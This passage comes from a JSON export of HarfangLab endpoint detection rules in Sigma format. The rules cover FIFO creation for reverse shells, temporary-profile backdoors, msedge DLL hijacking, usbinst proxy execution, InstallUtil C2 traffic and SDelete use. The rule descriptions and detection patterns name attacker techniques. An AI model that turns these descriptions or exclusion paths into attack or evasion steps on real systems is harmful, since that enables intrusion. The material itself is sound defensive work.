"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623164Z",
"creation_date": "2026-03-23T11:45:34.623166Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623170Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://linux.die.net/man/1/mkfifo",
"https://threatpost.com/mitel-voip-bug-exploited/180079/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_fifo_file_created.yml",
"content": "title: FIFO File Created\nid: 0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47\ndescription: |\n Detects the execution of mkfifo or mknod.\n Both utilities can be used to create a FIFO file, a special kind of file that can be processed by two process at the same time (one writing to it and the other one reading it).\n Adversaries can create FIFO files in combination with openssl_client to create a reverse shell.\n It is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\nreferences:\n - https://linux.die.net/man/1/mkfifo\n - https://threatpost.com/mitel-voip-bug-exploited/180079/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2023/12/15\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_mkfifo:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mkfifo'\n\n selection_mknod:\n # For new agents, we use the correlation rule (fc9663c5-b88d-487a-98b3-421c01431987).\n AgentVersion|lt|version: 5.4.0\n Image|endswith: '/mknod'\n CommandLine|endswith: ' p'\n\n exclusion_bitdefender_install:\n ParentImage: '/usr/bin/??sh'\n ParentCommandLine|contains:\n - '/installer'\n - '/uninstall'\n - '/opt/bitdefender-security-tools/bin/'\n CurrentDirectory|contains: '/bitdefender'\n\n exclusion_rt_sctemp:\n # mkfifo rt_sctemp/ficsecuqlik_dataware.fifo\n # mkfifo rt_sctemp/ventiv_salaries.fifo\n CommandLine: 'mkfifo rt_sctemp/*.fifo'\n\n exclusion_flowcell_dna:\n CommandLine: 'mkfifo /dev/shm/nxf.*/.command.*'\n\n exclusion_qubes:\n ParentCommandLine|contains: '/usr/lib/qubes/qubes-rpc-multiplexer'\n\n exclusion_gitstatus:\n - CommandLine|contains: ' -- /tmp/gitstatus.'\n - ParentCommandLine|contains: ' -- 
/tmp/gitstatus.'\n\n exclusion_powerlevel10k:\n - CommandLine|contains: ' -- /tmp/p10k.worker.'\n - ParentCommandLine|contains: ' -- /tmp/p10k.worker.'\n\n exclusion_dracut:\n - CommandLine|startswith:\n - 'mkfifo /var/tmp/dracut.'\n - 'mkfifo /tmp/dracut.'\n - ParentCommandLine|startswith:\n - '/usr/bin/bash -p /bin/dracut'\n - '/usr/bin/bash -p /usr/bin/dracut'\n\n exclusion_hot_db_backup:\n ParentCommandLine|startswith: '/bin/sh /*/oracle/scripts/hot_db_backup.sh '\n\n exclusion_sqwmys_dumpdatabase:\n ParentCommandLine|startswith: '/bin/ksh /*/sqwareproduction/mysql/bin/sqwmys_dumpdatabase.ksh '\n\n exclusion_eset:\n Ancestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_scality:\n CommandLine: 'mkfifo /tmp/tmp.*/stdout /tmp/tmp.*/stderr'\n ParentCommandLine: '/bin/bash /usr/bin/scality-backup'\n\n exclusion_agent:\n CommandLine|startswith: 'mkfifo /tmp/agent_linux_x86_64.sh.pipe.'\n\n exclusion_qradar:\n GrandparentCommandLine: '/opt/qradar/ca/bin/si-qradarca monitor -debug'\n\n exclusion_code:\n - ParentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n - GrandparentImage:\n - '/snap/code/*/usr/share/code/code'\n - '/usr/share/code/code'\n\n exclusion_codium:\n ParentImage: '/usr/share/codium/codium'\n\n exclusion_kamailio:\n CommandLine|startswith: 'mkfifo /tmp/kamailio_'\n ParentCommandLine|startswith: '/bin/sh /sbin/kamctl '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/opt/VRTSvcs/bin/Application/ApplicationAgent|'\n - '|/opt/oneautomation/*/smgr/bin/ucybsmgr'\n - '/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/crond|'\n\n exclusion_tmux:\n CommandLine:\n - 'mkfifo /tmp/tmux_fzf_session_name'\n - 'mkfifo /tmp/fzf-fifo?-*'\n - 'mkfifo -m o+w /tmp/fzf-fifo?-*'\n Ancestors|contains: '/usr/bin/tmux|'\n\n exclusion_windsurf:\n GrandparentImage: '/usr/share/windsurf/windsurf'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0fd0b4f2-4170-4bb9-b4fa-6d26e78dce47",
"rule_name": "FIFO File Created",
"rule_description": "Detects the execution of mkfifo or mknod.\nBoth utilities can be used to create a FIFO file, a special kind of file that can be processed by two processes at the same time (one writing to it and the other one reading it).\nAdversaries can create FIFO files in combination with openssl_client to create a reverse shell.\nIt is recommended to investigate the process that ran mkfifo/mknod and its execution context to determine if this action was legitimate.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-01-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079326Z",
"creation_date": "2026-03-23T11:45:34.079328Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079332Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6",
"https://attack.mitre.org/techniques/T1136/001/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_temporary_user_profile_creation.yml",
"content": "title: Temporary User Profile Created\nid: 0fd65b55-ba18-4a16-86bb-19fdfaeb3e37\ndescription: |\n Detects the creation of a temporary user profile.\n A temporary profile is created each time an error condition prevents the user profile from loading.\n Temporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\n A temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\n An attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\n It is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\nreferences:\n - https://answers.microsoft.com/en-us/windows/forum/all/windows-temporary-user-profile-temp-issue/5fbefc7c-0b82-4395-bfda-6d7e2ebeacc6\n - https://attack.mitre.org/techniques/T1136/001/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/03/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\TEMP\\NTUSER.DAT'\n\n exclusion_microsoftsearchinbing:\n Image: '?:\\Program Files (x86)\\Microsoft\\Microsoft Search in Bing\\MicrosoftSearchInBing.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n Image: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding 
???????????????????????????????? E Global\\MSI0000'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding ???????????????????????????????? E Global\\MSI0000'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_symantec:\n ProcessImage|startswith: '?:\\Program Files\\Symantec\\Symantec Endpoint Protection\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0fd65b55-ba18-4a16-86bb-19fdfaeb3e37",
"rule_name": "Temporary User Profile Created",
"rule_description": "Detects the creation of a temporary user profile.\nA temporary profile is created each time an error condition prevents the user profile from loading.\nTemporary profiles are deleted at the end of each session, and changes made by the user to desktop settings and files are lost when the user logs off.\nA temporary profile is created in \"C:\\Users\\TEMP\" instead of the standard user profile folder \"C:\\Users\\\".\nAn attacker can create this kind of user profile as a backdoor account to erase their tracks automatically after a log off.\nIt is recommended to investigate the actions that this temporary user may have taken to determine whether this action was legitimate.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10614140-6f5c-442a-b818-e7f6202dc54a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598780Z",
"creation_date": "2026-03-23T11:45:34.598784Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598791Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msedge.yml",
"content": "title: DLL Hijacking via msedge.exe\nid: 10614140-6f5c-442a-b818-e7f6202dc54a\ndescription: |\n Detects potential Windows DLL Hijacking via msedge.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedge.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dataexchange.dll'\n - '\\explorerframe.dll'\n - '\\fastprox.dll'\n - '\\msctf.dll'\n - '\\mswsock.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\ntmarta.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\twinapi.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\windowsudk.shellcommon.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla 
Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\SysWOW64\\\\wbem\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\System32\\\\wbem\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Windows\\WinSxS\\\\wbem\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "10614140-6f5c-442a-b818-e7f6202dc54a",
"rule_name": "DLL Hijacking via msedge.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msedge.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "106504ea-01dd-41ce-a381-3e8f27c77ff0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077409Z",
"creation_date": "2026-03-23T11:45:34.077411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077415Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_usbinst.yml",
"content": "title: Proxy Execution via Usbinst\nid: 106504ea-01dd-41ce-a381-3e8f27c77ff0\ndescription: |\n Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\n This binary, which is signed by Citrix, can be used to start malicious binaries whose inf file is passed as a parameter to usbinst.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to use a \"File download\" job to donwload and analyze the .inf file present in the command-line for malicious content.\nreferences:\n - https://github.com/api0cradle/LOLBAS/blob/master/OtherBinaries/Usbinst.md\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # By default C:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\Usbinst.exe\n - OriginalFileName: 'USBINST.EXE'\n - Image|endswith: '\\usbinst.exe'\n\n selection_arg:\n CommandLine|contains|all:\n - ' InstallHinfSection'\n - 'DefaultInstall'\n\n exclusion_citrix:\n - Image|endswith:\n - '\\Drivers64\\usbinst.exe'\n - '\\Devices64\\usbinst.exe'\n Signed: 'true'\n Signature: 'Citrix Systems, Inc.'\n - CommandLine|contains:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files 
(x86)\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Devices64\\ctxusbm\\ctxusbmon.inf'\n\n condition: selection and selection_arg and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "106504ea-01dd-41ce-a381-3e8f27c77ff0",
"rule_name": "Proxy Execution via Usbinst",
"rule_description": "Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\nThis binary, which is signed by Citrix, can be used to start malicious binaries whose .inf file is passed as a parameter to usbinst.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to use a \"File download\" job to download and analyze the .inf file present in the command line for malicious content.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "108163b7-c707-4764-bf00-b43b3ae7e56d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080094Z",
"creation_date": "2026-03-23T11:45:34.080096Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080100Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1218/004/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1218_004_installutil_suspicious_network_communication.yml",
"content": "title: Suspicious InstallUtil.exe Network Communication\nid: 108163b7-c707-4764-bf00-b43b3ae7e56d\ndescription: |\n Detects a suspicious network communication from InstallUtil.exe.\n Attackers have used InstallUtil in the past to execute a malicious Beacon stager. It is commonly used for the Covenant Framework InstallUtil launcher.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\nreferences:\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/004/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/11/10\nmodified: 2025/05/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.004\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n - Image|endswith: '\\InstallUtil.exe'\n - ProcessOriginalFileName: 'InstallUtil.exe'\n\n exclusion_localhost:\n DestinationIp:\n - '127.0.0.1'\n - '::1'\n\n exclusion_programfiles:\n ProcessCommandLine|contains:\n - '\\InstallUtil.exe *:\\Program Files\\'\n - '\\InstallUtil.exe *:\\Program Files (x86)\\'\n\n exclusion_archimed:\n - ProcessParentImage: '?:\\Program Files (x86)\\Archimed\\Elise\\EliseInstallUninstall.exe'\n - ProcessParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\\\*'\n - ProcessCurrentDirectory:\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4'\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\'\n\n 
exclusion_devexpress:\n ProcessParentImage|endswith: '\\DevExpressComponents-*.exe'\n ProcessCommandLine|contains|all:\n - ' /LogFile='\n - ' /DemosDir='\n - ' /DemosName=Components '\n - '\\Components\\System\\Components\\DevExpress.DemosUpdater.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "108163b7-c707-4764-bf00-b43b3ae7e56d",
"rule_name": "Suspicious InstallUtil.exe Network Communication",
"rule_description": "Detects a suspicious network communication from InstallUtil.exe.\nAttackers have used InstallUtil in the past to execute a malicious Beacon stager. It is commonly used for the Covenant Framework InstallUtil launcher.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\n",
"rule_creation_date": "2021-11-10",
"rule_modified_date": "2025-05-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1071",
"attack.t1218.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087529Z",
"creation_date": "2026-03-23T11:45:34.087532Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087539Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/software/S0195/"
],
"name": "t1070_004_sdelete.yml",
"content": "title: SDelete Tool Execution\nid: 108c4c3b-fe29-4e66-8036-5c56b0423fcb\ndescription: |\n Detects the execution of the SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\n This tool is part of the Microsoft Sysinternals suite and is often used by attackers to remove the files left behind by their malicious activities.\n It is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\nreferences:\n - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/software/S0195/\ndate: 2021/06/18\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.t1485\n - attack.s0195\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.SDelete\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\sdelete.exe'\n - '\\sdelete64.exe'\n OriginalFileName: 'sdelete.exe'\n\n exclusion_image:\n Image:\n - '?:\\ProgramData\\chocolatey\\bin\\sdelete.exe'\n - '?:\\Program Files (x86)\\Skidata\\ParkingSW\\\\*\\Tools\\sdelete.exe'\n\n exclusion_generic_scripts_folder:\n ProcessGrandparentCommandLine|startswith: 'cscript.exe \\\\\\\\*\\\\*$\\Scripts\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb",
"rule_name": "SDelete Tool Execution",
"rule_description": "Detects the execution of the SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\nThis tool is part of the Microsoft Sysinternals suite and is often used by attackers to remove the files left behind by their malicious activities.\nIt is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075752Z",
"creation_date": "2026-03-23T11:45:34.075754Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075759Z",
"rule_level": "high",
"rule_confidence": "strong",
